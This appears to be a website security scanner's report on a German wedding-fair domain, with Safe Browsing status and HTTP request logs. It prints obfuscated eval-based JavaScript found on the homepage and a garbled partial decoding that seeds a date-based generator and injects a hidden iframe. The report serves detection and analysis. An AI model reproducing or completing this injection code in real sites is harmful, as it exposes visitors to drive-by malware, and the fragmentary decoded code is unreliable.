Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hochzeitsmessen-remsmurr.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hochzeitsmessen-remsmurr.com/ | 200 OK Content-Length: 6846 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{abgraebg++}catch(ratntndrt){try{1512|htxhgrnegbr}catch(fzgnergz){e=window["ev"+"al"]}}
if(1){f=[91,105,97,88,104,92,100,98,19,99,89,107,105,70,84,99,88,98,98,66,104,98,86,88,103,28,28,112,1,-3,21,20,19,21,106,84,103,20,91,94,20,48,21,104,91,94,103,33,104,89,88,89,20,34,21,104,91,94,103,33,70,47,0,-1,20,19,21,20,105,86,102,19,97,99,19,50,20,103,93,93,102,35,103,88,90,88,19,26,20,103,93,93,102,35,69,46,2,-2,19,21,20,19,107,85,101,21,104,88,104,104,19,50,20,103,93,93,102,35,53,19,31,20,95, if(012===10)e("if(1)"+s); Decoded script: if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports:
| ||
http://hochzeitsmessen-remsmurr.com/test404page.js | 404 Not Found Content-Length: 478 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hochzeitsmessen-remsmurr.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 00:29:26 GMT
Accept-Ranges: bytes
ETag: "4d6a8be-1abe-4c80048561980"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6846
Content-Type: text/html
Last-Modified: Fri, 24 Aug 2012 10:17:26 GMT
...6846 bytes of data.
GET / HTTP/1.1
Host: hochzeitsmessen-remsmurr.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 00:29:26 GMT
Accept-Ranges: bytes
ETag: "4d6a8be-1abe-4c80048561980"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6846
Content-Type: text/html
Last-Modified: Fri, 24 Aug 2012 10:17:26 GMT
...6846 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hochzeitsmessen-remsmurr.com
Referer: http://www.google.com/search?q=hochzeitsmessen-remsmurr.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hochzeitsmessen-remsmurr.com
Referer: http://www.google.com/search?q=hochzeitsmessen-remsmurr.com
Result:
The result is similar to the first query. There are no suspicious redirects found.